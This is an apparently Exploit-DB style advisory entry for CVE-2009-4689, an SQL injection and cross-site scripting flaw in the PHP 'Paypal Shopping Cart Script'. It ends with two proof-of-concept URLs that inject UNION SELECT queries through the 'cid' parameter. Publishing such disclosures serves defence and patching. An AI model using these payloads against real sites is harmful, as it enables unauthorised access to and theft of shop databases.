Paypal Shopping Cart Script - 'index.php?cid' SQL Injection
Author: 599eme Man
type: webapps
platform: php
port:
date_added: 2009-08-21
date_updated: 2014-09-20
verified: 1
codes: CVE-2009-4689;OSVDB-56139
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/43471/info
Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/paypalshopping/index.php?cid=7%20union%20all%20select%201,2,3,version(),5,6,7--
http://www.example.com/paypalshopping/index.php?cid=1%20AND%201=null+union+select+1,2,3,version(),5,6,7--